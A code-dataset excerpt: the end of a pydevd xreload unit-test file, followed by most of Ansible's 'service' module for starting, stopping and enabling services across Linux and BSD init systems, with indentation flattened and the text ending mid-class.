def foo(self):
return self.CONSTANT
"""
SAMPLE_CODE2 = """
class B(object):
CONSTANT = 1
@classmethod
def __xreload_after_reload_update__(cls):
cls.CONSTANT = 2
def foo(self):
return self.CONSTANT
"""
self.make_mod(sample=SAMPLE_CODE1)
import x
foo = x.B().foo
self.assertEqual(foo(), 1)
self.make_mod(sample=SAMPLE_CODE2)
pydevd_reload.xreload(x)
self.assertEqual(foo(), 2) #Actually updated it now!
def test_update_constant_with_custom_code(self):
SAMPLE_CODE1 = """
class B(object):
CONSTANT = 1
def foo(self):
return self.CONSTANT
"""
SAMPLE_CODE2 = """
class B(object):
CONSTANT = 2
def __xreload_old_new__(cls, name, old, new):
if name == 'CONSTANT':
cls.CONSTANT = new
__xreload_old_new__ = classmethod(__xreload_old_new__)
def foo(self):
return self.CONSTANT
"""
self.make_mod(sample=SAMPLE_CODE1)
import x
foo = x.B().foo
self.assertEqual(foo(), 1)
self.make_mod(sample=SAMPLE_CODE2)
pydevd_reload.xreload(x)
self.assertEqual(foo(), 2) #Actually updated it now!
def test_update_with_slots(self):
SAMPLE_CODE1 = """
class B(object):
__slots__ = ['bar']
"""
SAMPLE_CODE2 = """
class B(object):
__slots__ = ['bar', 'foo']
def m1(self):
self.bar = 10
return 1
"""
self.make_mod(sample=SAMPLE_CODE1)
import x
B = x.B
self.make_mod(sample=SAMPLE_CODE2)
pydevd_reload.xreload(x)
b = B()
self.assertEqual(1, b.m1())
self.assertEqual(10, b.bar)
self.assertRaises(Exception, setattr, b, 'foo', 20) #__slots__ can't be updated
if __name__ == "__main__":
# import sys;sys.argv = ['', 'Test.test_reload_custom_code_after_changes_in_class']
unittest.main()
| epl-1.0 |
smiller171/ansible-modules-core | system/service.py | 8 | 57233 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2012, Michael DeHaan <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: service
author:
- "Ansible Core Team"
- "Michael DeHaan"
version_added: "0.1"
short_description: Manage services.
description:
- Controls services on remote hosts. Supported init systems include BSD init,
OpenRC, SysV, Solaris SMF, systemd, upstart.
options:
name:
required: true
description:
- Name of the service.
state:
required: false
choices: [ started, stopped, restarted, reloaded ]
description:
- C(started)/C(stopped) are idempotent actions that will not run
commands unless necessary. C(restarted) will always bounce the
service. C(reloaded) will always reload. B(At least one of state
and enabled are required.)
sleep:
required: false
version_added: "1.3"
description:
- If the service is being C(restarted) then sleep this many seconds
between the stop and start command. This helps to workaround badly
behaving init scripts that exit immediately after signaling a process
to stop.
pattern:
required: false
version_added: "0.7"
description:
- If the service does not respond to the status command, name a
substring to look for as would be found in the output of the I(ps)
command as a stand-in for a status result. If the string is found,
the service will be assumed to be running.
enabled:
required: false
choices: [ "yes", "no" ]
description:
- Whether the service should start on boot. B(At least one of state and
enabled are required.)
runlevel:
required: false
default: 'default'
description:
- "For OpenRC init scripts (ex: Gentoo) only. The runlevel that this service belongs to."
arguments:
description:
- Additional arguments provided on the command line
aliases: [ 'args' ]
must_exist:
required: false
default: true
version_added: "2.0"
description:
- Avoid a module failure if the named service does not exist. Useful
for opportunistically starting/stopping/restarting a list of
potential services.
'''
EXAMPLES = '''
# Example action to start service httpd, if not running
- service: name=httpd state=started
# Example action to stop service httpd, if running
- service: name=httpd state=stopped
# Example action to restart service httpd, in all cases
- service: name=httpd state=restarted
# Example action to reload service httpd, in all cases
- service: name=httpd state=reloaded
# Example action to enable service httpd, and not touch the running state
- service: name=httpd enabled=yes
# Example action to start service foo, based on running process /usr/bin/foo
- service: name=foo pattern=/usr/bin/foo state=started
# Example action to restart network service for interface eth0
- service: name=network state=restarted args=eth0
# Example action to restart nova-compute if it exists
- service: name=nova-compute state=restarted must_exist=no
'''
import platform
import os
import re
import tempfile
import shlex
import select
import time
import string
import glob
# The distutils module is not shipped with SUNWPython on Solaris.
# It's in the SUNWPython-devel package which also contains development files
# that don't belong on production boxes. Since our Solaris code doesn't
# depend on LooseVersion, do not import it on Solaris.
if platform.system() != 'SunOS':
from distutils.version import LooseVersion
class Service(object):
"""
This is the generic Service manipulation class that is subclassed
based on platform.
A subclass should override the following action methods:-
- get_service_tools
- service_enable
- get_service_status
- service_control
All subclasses MUST define platform and distribution (which may be None).
"""
platform = 'Generic'
distribution = None
def __new__(cls, *args, **kwargs):
return load_platform_subclass(Service, args, kwargs)
def __init__(self, module):
self.module = module
self.name = module.params['name']
self.state = module.params['state']
self.sleep = module.params['sleep']
self.pattern = module.params['pattern']
self.enable = module.params['enabled']
self.runlevel = module.params['runlevel']
self.changed = False
self.running = None
self.crashed = None
self.action = None
self.svc_cmd = None
self.svc_initscript = None
self.svc_initctl = None
self.enable_cmd = None
self.arguments = module.params.get('arguments', '')
self.rcconf_file = None
self.rcconf_key = None
self.rcconf_value = None
self.svc_change = False
# select whether we dump additional debug info through syslog
self.syslogging = False
# ===========================================
# Platform specific methods (must be replaced by subclass).
def get_service_tools(self):
self.module.fail_json(msg="get_service_tools not implemented on target platform")
def service_enable(self):
self.module.fail_json(msg="service_enable not implemented on target platform")
def get_service_status(self):
self.module.fail_json(msg="get_service_status not implemented on target platform")
def service_control(self):
self.module.fail_json(msg="service_control not implemented on target platform")
# ===========================================
# Generic methods that should be used on all platforms.
def execute_command(self, cmd, daemonize=False):
if self.syslogging:
syslog.openlog('ansible-%s' % os.path.basename(__file__))
syslog.syslog(syslog.LOG_NOTICE, 'Command %s, daemonize %r' % (cmd, daemonize))
# Most things don't need to be daemonized
if not daemonize:
return self.module.run_command(cmd)
# This is complex because daemonization is hard for people.
# What we do is daemonize a part of this module, the daemon runs the
# command, picks up the return code and output, and returns it to the
# main process.
pipe = os.pipe()
pid = os.fork()
if pid == 0:
os.close(pipe[0])
# Set stdin/stdout/stderr to /dev/null
fd = os.open(os.devnull, os.O_RDWR)
if fd != 0:
os.dup2(fd, 0)
if fd != 1:
os.dup2(fd, 1)
if fd != 2:
os.dup2(fd, 2)
if fd not in (0, 1, 2):
os.close(fd)
# Make us a daemon. Yes, that's all it takes.
pid = os.fork()
if pid > 0:
os._exit(0)
os.setsid()
os.chdir("/")
pid = os.fork()
if pid > 0:
os._exit(0)
# Start the command
if isinstance(cmd, basestring):
cmd = shlex.split(cmd)
p = subprocess.Popen(cmd, shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE, preexec_fn=lambda: os.close(pipe[1]))
stdout = ""
stderr = ""
fds = [p.stdout, p.stderr]
# Wait for all output, or until the main process is dead and its output is done.
while fds:
rfd, wfd, efd = select.select(fds, [], fds, 1)
if not (rfd + wfd + efd) and p.poll() is not None:
break
if p.stdout in rfd:
dat = os.read(p.stdout.fileno(), 4096)
if not dat:
fds.remove(p.stdout)
stdout += dat
if p.stderr in rfd:
dat = os.read(p.stderr.fileno(), 4096)
if not dat:
fds.remove(p.stderr)
stderr += dat
p.wait()
# Return a JSON blob to parent
os.write(pipe[1], json.dumps([p.returncode, stdout, stderr]))
os.close(pipe[1])
os._exit(0)
elif pid == -1:
self.module.fail_json(msg="unable to fork")
else:
os.close(pipe[1])
os.waitpid(pid, 0)
# Wait for data from daemon process and process it.
data = ""
while True:
rfd, wfd, efd = select.select([pipe[0]], [], [pipe[0]])
if pipe[0] in rfd:
dat = os.read(pipe[0], 4096)
if not dat:
break
data += dat
return json.loads(data)
def check_ps(self):
# Set ps flags
if platform.system() == 'SunOS':
psflags = '-ef'
else:
psflags = 'auxww'
# Find ps binary
psbin = self.module.get_bin_path('ps', True)
(rc, psout, pserr) = self.execute_command('%s %s' % (psbin, psflags))
# If rc is 0, set running as appropriate
if rc == 0:
self.running = False
lines = psout.split("\n")
for line in lines:
if self.pattern in line and not "pattern=" in line:
# so as to not confuse ./hacking/test-module
self.running = True
break
def check_service_changed(self):
if self.state and self.running is None:
self.module.fail_json(msg="failed determining service state, possible typo of service name?")
# Find out if state has changed
if not self.running and self.state in ["started", "running", "reloaded"]:
self.svc_change = True
elif self.running and self.state in ["stopped","reloaded"]:
self.svc_change = True
elif self.state == "restarted":
self.svc_change = True
if self.module.check_mode and self.svc_change:
self.module.exit_json(changed=True, msg='service state changed')
def modify_service_state(self):
# Only do something if state will change
if self.svc_change:
# Control service
if self.state in ['started', 'running']:
self.action = "start"
elif not self.running and self.state == 'reloaded':
self.action = "start"
elif self.state == 'stopped':
self.action = "stop"
elif self.state == 'reloaded':
self.action = "reload"
elif self.state == 'restarted':
self.action = "restart"
if self.module.check_mode:
self.module.exit_json(changed=True, msg='changing service state')
return self.service_control()
else:
# If nothing needs to change just say all is well
rc = 0
err = ''
out = ''
return rc, out, err
def service_enable_rcconf(self):
if self.rcconf_file is None or self.rcconf_key is None or self.rcconf_value is None:
self.module.fail_json(msg="service_enable_rcconf() requires rcconf_file, rcconf_key and rcconf_value")
self.changed = None
entry = '%s="%s"\n' % (self.rcconf_key, self.rcconf_value)
RCFILE = open(self.rcconf_file, "r")
new_rc_conf = []
# Build a list containing the possibly modified file.
for rcline in RCFILE:
# Parse line removing whitespaces, quotes, etc.
rcarray = shlex.split(rcline, comments=True)
if len(rcarray) >= 1 and '=' in rcarray[0]:
(key, value) = rcarray[0].split("=", 1)
if key == self.rcconf_key:
if value.upper() == self.rcconf_value:
# Since the proper entry already exists we can stop iterating.
self.changed = False
break
else:
# We found the key but the value is wrong, replace with new entry.
rcline = entry
self.changed = True
# Add line to the list.
new_rc_conf.append(rcline)
# We are done with reading the current rc.conf, close it.
RCFILE.close()
# If we did not see any trace of our entry we need to add it.
if self.changed is None:
new_rc_conf.append(entry)
self.changed = True
if self.changed is True:
if self.module.check_mode:
self.module.exit_json(changed=True, msg="changing service enablement")
# Create a temporary file next to the current rc.conf (so we stay on the same filesystem).
# This way the replacement operation is atomic.
rcconf_dir = os.path.dirname(self.rcconf_file)
rcconf_base = os.path.basename(self.rcconf_file)
(TMP_RCCONF, tmp_rcconf_file) = tempfile.mkstemp(dir=rcconf_dir, prefix="%s-" % rcconf_base)
# Write out the contents of the list into our temporary file.
for rcline in new_rc_conf:
os.write(TMP_RCCONF, rcline)
# Close temporary file.
os.close(TMP_RCCONF)
# Replace previous rc.conf.
self.module.atomic_move(tmp_rcconf_file, self.rcconf_file)
# ===========================================
# Subclass: Linux
class LinuxService(Service):
"""
This is the Linux Service manipulation class - it is currently supporting
a mixture of binaries and init scripts for controlling services started at
boot, as well as for controlling the current state.
"""
platform = 'Linux'
distribution = None
def get_service_tools(self):
paths = [ '/sbin', '/usr/sbin', '/bin', '/usr/bin' ]
binaries = [ 'service', 'chkconfig', 'update-rc.d', 'rc-service', 'rc-update', 'initctl', 'systemctl', 'start', 'stop', 'restart', 'insserv' ]
initpaths = [ '/etc/init.d' ]
location = dict()
for binary in binaries:
location[binary] = self.module.get_bin_path(binary)
for initdir in initpaths:
initscript = "%s/%s" % (initdir,self.name)
if os.path.isfile(initscript):
self.svc_initscript = initscript
def check_systemd():
# verify systemd is installed (by finding systemctl)
if not location.get('systemctl', False):
return False
# Check if init is the systemd command, using comm as cmdline could be symlink
try:
f = open('/proc/1/comm', 'r')
except IOError, err:
# If comm doesn't exist, old kernel, no systemd
return False
for line in f:
if 'systemd' in line:
return True
return False
# Locate a tool to enable/disable a service
if location.get('systemctl',False) and check_systemd():
# service is managed by systemd
self.__systemd_unit = self.name
self.svc_cmd = location['systemctl']
self.enable_cmd = location['systemctl']
elif location.get('initctl', False) and os.path.exists("/etc/init/%s.conf" % self.name):
# service is managed by upstart
self.enable_cmd = location['initctl']
# set the upstart version based on the output of 'initctl version'
self.upstart_version = LooseVersion('0.0.0')
try:
version_re = re.compile(r'\(upstart (.*)\)')
rc,stdout,stderr = self.module.run_command('initctl version')
if rc == 0:
res = version_re.search(stdout)
if res:
self.upstart_version = LooseVersion(res.groups()[0])
except:
pass # we'll use the default of 0.0.0
if location.get('start', False):
# upstart -- rather than being managed by one command, start/stop/restart are actual commands
self.svc_cmd = ''
elif location.get('rc-service', False):
# service is managed by OpenRC
self.svc_cmd = location['rc-service']
self.enable_cmd = location['rc-update']
return # already have service start/stop tool too!
elif self.svc_initscript:
# service is managed by with SysV init scripts
if location.get('update-rc.d', False):
# and uses update-rc.d
self.enable_cmd = location['update-rc.d']
elif location.get('insserv', None):
# and uses insserv
self.enable_cmd = location['insserv']
elif location.get('chkconfig', False):
# and uses chkconfig
self.enable_cmd = location['chkconfig']
if self.enable_cmd is None:
if self.module.params['must_exist']:
self.module.fail_json(msg="no service or tool found for: %s" % self.name)
else:
# exiting without change on non-existent service
self.module.exit_json(changed=False, exists=False)
# If no service control tool selected yet, try to see if 'service' is available
if self.svc_cmd is None and location.get('service', False):
self.svc_cmd = location['service']
# couldn't find anything yet
if self.svc_cmd is None and not self.svc_initscript:
if self.module.params['must_exist']:
self.module.fail_json(msg='cannot find \'service\' binary or init script for service, possible typo in service name?, aborting')
else:
# exiting without change on non-existent service
self.module.exit_json(changed=False, exists=False)
if location.get('initctl', False):
self.svc_initctl = location['initctl']
def get_systemd_service_enabled(self):
(rc, out, err) = self.execute_command("%s is-enabled %s" % (self.enable_cmd, self.__systemd_unit,))
if rc == 0:
return True
return False
def get_systemd_status_dict(self):
(rc, out, err) = self.execute_command("%s show %s" % (self.enable_cmd, self.__systemd_unit,))
if rc != 0:
self.module.fail_json(msg='failure %d running systemctl show for %r: %s' % (rc, self.__systemd_unit, err))
key = None
value_buffer = []
status_dict = {}
for line in out.splitlines():
if not key:
key, value = line.split('=', 1)
# systemd fields that are shell commands can be multi-line
# We take a value that begins with a "{" as the start of
# a shell command and a line that ends with "}" as the end of
# the command
if value.lstrip().startswith('{'):
if value.rstrip().endswith('}'):
status_dict[key] = value
key = None
else:
value_buffer.append(value)
else:
status_dict[key] = value
key = None
else:
if line.rstrip().endswith('}'):
status_dict[key] = '\n'.join(value_buffer)
key = None
else:
value_buffer.append(value)
return status_dict
def get_systemd_service_status(self):
d = self.get_systemd_status_dict()
if d.get('ActiveState') == 'active':
# run-once services (for which a single successful exit indicates
# that they are running as designed) should not be restarted here.
# Thus, we are not checking d['SubState'].
self.running = True
self.crashed = False
elif d.get('ActiveState') == 'failed':
self.running = False
self.crashed = True
elif d.get('ActiveState') is None:
self.module.fail_json(msg='No ActiveState value in systemctl show output for %r' % (self.__systemd_unit,))
else:
self.running = False
self.crashed = False
return self.running
def get_service_status(self):
if self.svc_cmd and self.svc_cmd.endswith('systemctl'):
return self.get_systemd_service_status()
self.action = "status"
rc, status_stdout, status_stderr = self.service_control()
# if we have decided the service is managed by upstart, we check for some additional output...
if self.svc_initctl and self.running is None:
# check the job status by upstart response
initctl_rc, initctl_status_stdout, initctl_status_stderr = self.execute_command("%s status %s" % (self.svc_initctl, self.name))
if "stop/waiting" in initctl_status_stdout:
self.running = False
elif "start/running" in initctl_status_stdout:
self.running = True
if self.svc_cmd and self.svc_cmd.endswith("rc-service") and self.running is None:
openrc_rc, openrc_status_stdout, openrc_status_stderr = self.execute_command("%s %s status" % (self.svc_cmd, self.name))
self.running = "started" in openrc_status_stdout
self.crashed = "crashed" in openrc_status_stderr
# if the job status is still not known check it by status output keywords
# Only check keywords if there's only one line of output (some init
# scripts will output verbosely in case of error and those can emit
# keywords that are picked up as false positives
if self.running is None and status_stdout.count('\n') <= 1:
# first transform the status output that could irritate keyword matching
cleanout = status_stdout.lower().replace(self.name.lower(), '')
if "stop" in cleanout:
self.running = False
elif "run" in cleanout and "not" in cleanout:
self.running = False
elif "run" in cleanout and "not" not in cleanout:
self.running = True
elif "start" in cleanout and "not" not in cleanout:
self.running = True
elif 'could not access pid file' in cleanout:
self.running = False
elif 'is dead and pid file exists' in cleanout:
self.running = False
elif 'dead but subsys locked' in cleanout:
self.running = False
elif 'dead but pid file exists' in cleanout:
self.running = False
# if the job status is still not known check it by response code
# For reference, see:
# http://refspecs.linuxbase.org/LSB_4.1.0/LSB-Core-generic/LSB-Core-generic/iniscrptact.html
if self.running is None:
if rc in [1, 2, 3, 4, 69]:
self.running = False
elif rc == 0:
self.running = True
# if the job status is still not known check it by special conditions
if self.running is None:
if self.name == 'iptables' and "ACCEPT" in status_stdout:
# iptables status command output is lame
# TODO: lookup if we can use a return code for this instead?
self.running = True
return self.running
def service_enable(self):
if self.enable_cmd is None:
self.module.fail_json(msg='cannot detect command to enable service %s, typo or init system potentially unknown' % self.name)
self.changed = True
action = None
#
# Upstart's initctl
#
if self.enable_cmd.endswith("initctl"):
def write_to_override_file(file_name, file_contents, ):
override_file = open(file_name, 'w')
override_file.write(file_contents)
override_file.close()
initpath = '/etc/init'
if self.upstart_version >= LooseVersion('0.6.7'):
manreg = re.compile('^manual\s*$', re.M | re.I)
config_line = 'manual\n'
else:
manreg = re.compile('^start on manual\s*$', re.M | re.I)
config_line = 'start on manual\n'
conf_file_name = "%s/%s.conf" % (initpath, self.name)
override_file_name = "%s/%s.override" % (initpath, self.name)
# Check to see if files contain the manual line in .conf and fail if True
if manreg.search(open(conf_file_name).read()):
self.module.fail_json(msg="manual stanza not supported in a .conf file")
self.changed = False
if os.path.exists(override_file_name):
override_file_contents = open(override_file_name).read()
# Remove manual stanza if present and service enabled
if self.enable and manreg.search(override_file_contents):
self.changed = True
override_state = manreg.sub('', override_file_contents)
# Add manual stanza if not present and service disabled
elif not (self.enable) and not (manreg.search(override_file_contents)):
self.changed = True
override_state = '\n'.join((override_file_contents, config_line))
# service already in desired state
else:
pass
# Add file with manual stanza if service disabled
elif not (self.enable):
self.changed = True
override_state = config_line
else:
# service already in desired state
pass
if self.module.check_mode:
self.module.exit_json(changed=self.changed)
# The initctl method of enabling and disabling services is much
# different than for the other service methods. So actually
# committing the change is done in this conditional and then we
# skip the boilerplate at the bottom of the method
if self.changed:
try:
write_to_override_file(override_file_name, override_state)
except:
self.module.fail_json(msg='Could not modify override file')
return
#
# SysV's chkconfig
#
if self.enable_cmd.endswith("chkconfig"):
if self.enable:
action = 'on'
else:
action = 'off'
(rc, out, err) = self.execute_command("%s --list %s" % (self.enable_cmd, self.name))
if 'chkconfig --add %s' % self.name in err:
self.execute_command("%s --add %s" % (self.enable_cmd, self.name))
(rc, out, err) = self.execute_command("%s --list %s" % (self.enable_cmd, self.name))
if not self.name in out:
self.module.fail_json(msg="service %s does not support chkconfig" % self.name)
state = out.split()[-1]
# Check if we're already in the correct state
if "3:%s" % action in out and "5:%s" % action in out:
self.changed = False
return
#
# Systemd's systemctl
#
if self.enable_cmd.endswith("systemctl"):
if self.enable:
action = 'enable'
else:
action = 'disable'
# Check if we're already in the correct state
service_enabled = self.get_systemd_service_enabled()
# self.changed should already be true
if self.enable == service_enabled:
self.changed = False
return
#
# OpenRC's rc-update
#
if self.enable_cmd.endswith("rc-update"):
if self.enable:
action = 'add'
else:
action = 'delete'
(rc, out, err) = self.execute_command("%s show" % self.enable_cmd)
for line in out.splitlines():
service_name, runlevels = line.split('|')
service_name = service_name.strip()
if service_name != self.name:
continue
runlevels = re.split(r'\s+', runlevels)
# service already enabled for the runlevel
if self.enable and self.runlevel in runlevels:
self.changed = False
# service already disabled for the runlevel
elif not self.enable and self.runlevel not in runlevels:
self.changed = False
break
else:
# service already disabled altogether
if not self.enable:
self.changed = False
if not self.changed:
return
#
# update-rc.d style
#
if self.enable_cmd.endswith("update-rc.d"):
enabled = False
slinks = glob.glob('/etc/rc?.d/S??' + self.name)
if slinks:
enabled = True
if self.enable != enabled:
self.changed = True
if self.enable:
action = 'enable'
klinks = glob.glob('/etc/rc?.d/K??' + self.name)
if not klinks:
(rc, out, err) = self.execute_command("%s %s defaults" % (self.enable_cmd, self.name))
if rc != 0:
if err:
self.module.fail_json(msg=err)
else:
self.module.fail_json(msg=out) % (self.enable_cmd, self.name, action)
else:
action = 'disable'
if self.module.check_mode:
rc = 0
return
(rc, out, err) = self.execute_command("%s %s %s" % (self.enable_cmd, self.name, action))
if rc != 0:
if err:
self.module.fail_json(msg=err)
else:
self.module.fail_json(msg=out) % (self.enable_cmd, self.name, action)
else:
self.changed = False
return
#
# insserv (Debian 7)
#
if self.enable_cmd.endswith("insserv"):
if self.enable:
(rc, out, err) = self.execute_command("%s -n %s" % (self.enable_cmd, self.name))
else:
(rc, out, err) = self.execute_command("%s -nr %s" % (self.enable_cmd, self.name))
self.changed = False
for line in err.splitlines():
if self.enable and line.find('enable service') != -1:
self.changed = True
break
if not self.enable and line.find('remove service') != -1:
self.changed = True
break
if self.module.check_mode:
self.module.exit_json(changed=self.changed)
if not self.changed:
return
if self.enable:
(rc, out, err) = self.execute_command("%s %s" % (self.enable_cmd, self.name))
if (rc != 0) or (err != ''):
self.module.fail_json(msg=("Failed to install service. rc: %s, out: %s, err: %s" % (rc, out, err)))
return (rc, out, err)
else:
(rc, out, err) = self.execute_command("%s -r %s" % (self.enable_cmd, self.name))
if (rc != 0) or (err != ''):
self.module.fail_json(msg=("Failed to remove service. rc: %s, out: %s, err: %s" % (rc, out, err)))
return (rc, out, err)
#
# If we've gotten to the end, the service needs to be updated
#
self.changed = True
# we change argument order depending on real binary used:
# rc-update and systemctl need the argument order reversed
if self.enable_cmd.endswith("rc-update"):
args = (self.enable_cmd, action, self.name + " " + self.runlevel)
elif self.enable_cmd.endswith("systemctl"):
args = (self.enable_cmd, action, self.__systemd_unit)
else:
args = (self.enable_cmd, self.name, action)
if self.module.check_mode:
self.module.exit_json(changed=self.changed)
(rc, out, err) = self.execute_command("%s %s %s" % args)
if rc != 0:
if err:
self.module.fail_json(msg="Error when trying to %s %s: rc=%s %s" % (action, self.name, rc, err))
else:
self.module.fail_json(msg="Failure for %s %s: rc=%s %s" % (action, self.name, rc, out))
return (rc, out, err)
def service_control(self):
# Decide what command to run
svc_cmd = ''
arguments = self.arguments
if self.svc_cmd:
if not self.svc_cmd.endswith("systemctl"):
# SysV and OpenRC take the form <cmd> <name> <action>
svc_cmd = "%s %s" % (self.svc_cmd, self.name)
else:
# systemd commands take the form <cmd> <action> <name>
svc_cmd = self.svc_cmd
arguments = "%s %s" % (self.__systemd_unit, arguments)
elif self.svc_cmd is None and self.svc_initscript:
# upstart
svc_cmd = "%s" % self.svc_initscript
# In OpenRC, if a service crashed, we need to reset its status to
# stopped with the zap command, before we can start it back.
if self.svc_cmd and self.svc_cmd.endswith('rc-service') and self.action == 'start' and self.crashed:
self.execute_command("%s zap" % svc_cmd, daemonize=True)
if self.action is not "restart":
if svc_cmd != '':
# upstart or systemd or OpenRC
rc_state, stdout, stderr = self.execute_command("%s %s %s" % (svc_cmd, self.action, arguments), daemonize=True)
else:
# SysV
rc_state, stdout, stderr = self.execute_command("%s %s %s" % (self.action, self.name, arguments), daemonize=True)
elif self.svc_cmd and self.svc_cmd.endswith('rc-service'):
# All services in OpenRC support restart.
rc_state, stdout, stderr = self.execute_command("%s %s %s" % (svc_cmd, self.action, arguments), daemonize=True)
else:
# In other systems, not all services support restart. Do it the hard way.
if svc_cmd != '':
# upstart or systemd
rc1, stdout1, stderr1 = self.execute_command("%s %s %s" % (svc_cmd, 'stop', arguments), daemonize=True)
else:
# SysV
rc1, stdout1, stderr1 = self.execute_command("%s %s %s" % ('stop', self.name, arguments), daemonize=True)
if self.sleep:
time.sleep(self.sleep)
if svc_cmd != '':
# upstart or systemd
rc2, stdout2, stderr2 = self.execute_command("%s %s %s" % (svc_cmd, 'start', arguments), daemonize=True)
else:
# SysV
rc2, stdout2, stderr2 = self.execute_command("%s %s %s" % ('start', self.name, arguments), daemonize=True)
# merge return information
if rc1 != 0 and rc2 == 0:
rc_state = rc2
stdout = stdout2
stderr = stderr2
else:
rc_state = rc1 + rc2
stdout = stdout1 + stdout2
stderr = stderr1 + stderr2
return(rc_state, stdout, stderr)
# ===========================================
# Subclass: FreeBSD
class FreeBsdService(Service):
"""
This is the FreeBSD Service manipulation class - it uses the /etc/rc.conf
file for controlling services started at boot and the 'service' binary to
check status and perform direct service manipulation.
"""
platform = 'FreeBSD'
distribution = None
def get_service_tools(self):
self.svc_cmd = self.module.get_bin_path('service', True)
if not self.svc_cmd:
self.module.fail_json(msg='unable to find service binary')
def get_service_status(self):
rc, stdout, stderr = self.execute_command("%s %s %s %s" % (self.svc_cmd, self.name, 'onestatus', self.arguments))
if self.name == "pf":
self.running = "Enabled" in stdout
else:
if rc == 1:
self.running = False
elif rc == 0:
self.running = True
def service_enable(self):
if self.enable:
self.rcconf_value = "YES"
else:
self.rcconf_value = "NO"
rcfiles = [ '/etc/rc.conf','/etc/rc.conf.local', '/usr/local/etc/rc.conf' ]
for rcfile in rcfiles:
if os.path.isfile(rcfile):
self.rcconf_file = rcfile
rc, stdout, stderr = self.execute_command("%s %s %s %s" % (self.svc_cmd, self.name, 'rcvar', self.arguments))
cmd = "%s %s %s %s" % (self.svc_cmd, self.name, 'rcvar', self.arguments)
rcvars = shlex.split(stdout, comments=True)
if not rcvars:
self.module.fail_json(msg="unable to determine rcvar", stdout=stdout, stderr=stderr)
# In rare cases, i.e. sendmail, rcvar can return several key=value pairs
# Usually there is just one, however. In other rare cases, i.e. uwsgi,
# rcvar can return extra uncommented data that is not at all related to
# the rcvar. We will just take the first key=value pair we come across
# and hope for the best.
for rcvar in rcvars:
if '=' in rcvar:
self.rcconf_key = rcvar.split('=')[0]
break
if self.rcconf_key is None:
self.module.fail_json(msg="unable to determine rcvar", stdout=stdout, stderr=stderr)
try:
return self.service_enable_rcconf()
except:
self.module.fail_json(msg='unable to set rcvar')
def service_control(self):
if self.action is "start":
self.action = "onestart"
if self.action is "stop":
self.action = "onestop"
if self.action is "reload":
self.action = "onereload"
return self.execute_command("%s %s %s %s" % (self.svc_cmd, self.name, self.action, self.arguments))
# ===========================================
# Subclass: OpenBSD
class OpenBsdService(Service):
"""
This is the OpenBSD Service manipulation class - it uses rcctl(8) or
/etc/rc.d scripts for service control. Enabling a service is
only supported if rcctl is present.
"""
platform = 'OpenBSD'
distribution = None
def get_service_tools(self):
self.enable_cmd = self.module.get_bin_path('rcctl')
if self.enable_cmd:
self.svc_cmd = self.enable_cmd
else:
rcdir = '/etc/rc.d'
rc_script = "%s/%s" % (rcdir, self.name)
if os.path.isfile(rc_script):
self.svc_cmd = rc_script
if not self.svc_cmd:
self.module.fail_json(msg='unable to find svc_cmd')
def get_service_status(self):
if self.enable_cmd:
rc, stdout, stderr = self.execute_command("%s %s %s" % (self.svc_cmd, 'check', self.name))
else:
rc, stdout, stderr = self.execute_command("%s %s" % (self.svc_cmd, 'check'))
if stderr:
self.module.fail_json(msg=stderr)
if rc == 1:
self.running = False
elif rc == 0:
self.running = True
def service_control(self):
if self.enable_cmd:
return self.execute_command("%s -f %s %s" % (self.svc_cmd, self.action, self.name))
else:
return self.execute_command("%s -f %s" % (self.svc_cmd, self.action))
def service_enable(self):
if not self.enable_cmd:
return super(OpenBsdService, self).service_enable()
rc, stdout, stderr = self.execute_command("%s %s %s %s" % (self.enable_cmd, 'getdef', self.name, 'flags'))
if stderr:
self.module.fail_json(msg=stderr)
getdef_string = stdout.rstrip()
# Depending on the service the string returned from 'getdef' may be
# either a set of flags or the boolean YES/NO
if getdef_string == "YES" or getdef_string == "NO":
default_flags = ''
else:
default_flags = getdef_string
rc, stdout, stderr = self.execute_command("%s %s %s %s" % (self.enable_cmd, 'get', self.name, 'flags'))
if stderr:
self.module.fail_json(msg=stderr)
get_string = stdout.rstrip()
# Depending on the service the string returned from 'get' may be
# either a set of flags or the boolean YES/NO
if get_string == "YES" or get_string == "NO":
current_flags = ''
else:
current_flags = get_string
# If there are arguments from the user we use these as flags unless
# they are already set.
if self.arguments and self.arguments != current_flags:
changed_flags = self.arguments
# If the user has not supplied any arguments and the current flags
# differ from the default we reset them.
elif not self.arguments and current_flags != default_flags:
changed_flags = ' '
# Otherwise there is no need to modify flags.
else:
changed_flags = ''
rc, stdout, stderr = self.execute_command("%s %s %s %s" % (self.enable_cmd, 'get', self.name, 'status'))
if self.enable:
if rc == 0 and not changed_flags:
return
if rc != 0:
status_action = "set %s status on" % (self.name)
else:
status_action = ''
if changed_flags:
flags_action = "set %s flags %s" % (self.name, changed_flags)
else:
flags_action = ''
else:
if rc == 1:
return
status_action = "set %s status off" % self.name
flags_action = ''
# Verify state assumption
if not status_action and not flags_action:
self.module.fail_json(msg="neither status_action or status_flags is set, this should never happen")
if self.module.check_mode:
self.module.exit_json(changed=True, msg="changing service enablement")
status_modified = 0
if status_action:
rc, stdout, stderr = self.execute_command("%s %s" % (self.enable_cmd, status_action))
if rc != 0:
if stderr:
self.module.fail_json(msg=stderr)
else:
self.module.fail_json(msg="rcctl failed to modify service status")
status_modified = 1
if flags_action:
rc, stdout, stderr = self.execute_command("%s %s" % (self.enable_cmd, flags_action))
if rc != 0:
if stderr:
if status_modified:
error_message = "rcctl modified service status but failed to set flags: " + stderr
else:
error_message = stderr
else:
if status_modified:
error_message = "rcctl modified service status but failed to set flags"
else:
error_message = "rcctl failed to modify service flags"
self.module.fail_json(msg=error_message)
self.changed = True
# ===========================================
# Subclass: NetBSD
class NetBsdService(Service):
"""
This is the NetBSD Service manipulation class - it uses the /etc/rc.conf
file for controlling services started at boot, check status and perform
direct service manipulation. Init scripts in /etc/rcd are used for
controlling services (start/stop) as well as for controlling the current
state.
"""
platform = 'NetBSD'
distribution = None
def get_service_tools(self):
